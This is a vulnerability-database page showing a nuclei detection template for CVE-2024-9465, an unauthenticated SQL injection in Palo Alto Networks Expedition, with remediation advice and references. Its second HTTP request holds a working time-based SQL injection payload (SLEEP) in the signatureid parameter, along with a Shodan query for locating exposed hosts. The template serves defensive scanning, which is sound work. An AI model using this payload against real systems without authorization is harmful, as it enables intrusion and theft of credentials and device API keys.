Lucene search
K

Palo Alto Expedition - SQL Injection

🗓️ 25 Jun 2026 01:31:50Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 54 Views

An SQL injection vulnerability in Palo Alto Networks Expedition allows attackers to reveal and access sensitive data, create and read arbitrary files, and compromise the system

Related
Refs
Code
id: CVE-2024-9465

info:
  name: Palo Alto Expedition - SQL Injection
  author: DhiyaneshDK
  severity: high
  description: |
    An SQL injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to reveal Expedition database contents, such as password hashes, usernames, device configurations, and device API keys. With this, attackers can also create and read arbitrary files on the Expedition system.
  impact: |
    Unauthenticated attackers can exploit SQL injection to reveal Expedition database contents including password hashes, usernames, device configurations, and API keys, and create or read arbitrary files on the system.
  remediation: |
    Apply security updates from Palo Alto Networks as specified in security advisory PAN-SA-2024-0010 to address the SQL injection vulnerability in Expedition.
  reference:
    - https://security.paloaltonetworks.com/PAN-SA-2024-0010
    - https://github.com/horizon3ai/CVE-2024-9465/tree/main
    - https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9465
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
    cvss-score: 8.2
    cve-id: CVE-2024-9465
    cwe-id: CWE-89
    epss-score: 0.99597
    epss-percentile: 0.99944
  metadata:
    verified: true
    max-request: 2
    vendor: paloaltonetworks
    product: expedition
    shodan-query: http.favicon.hash:1499876150
  tags: time-based-sqli,cve,cve2024,palo-alto,sqli,kev,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=get&type=existing_ruleBases&project=pandbRBAC

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "ruleBasesNames")'
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 20s
        POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=import&type=test&project=pandbRBAC&signatureid=1%20AND%20(SELECT%201234%20FROM%20(SELECT(SLEEP(6)))test)

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
        condition: and
# digest: 490a004630440220018c9af9d480d171b52388a8ad27bd00200f87d2641b84ad7aab65beabf6cf0802206a32f025f0a379a8b0941405533f2d91e0efcd2b893bf50633d1ff359bcf60ec:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation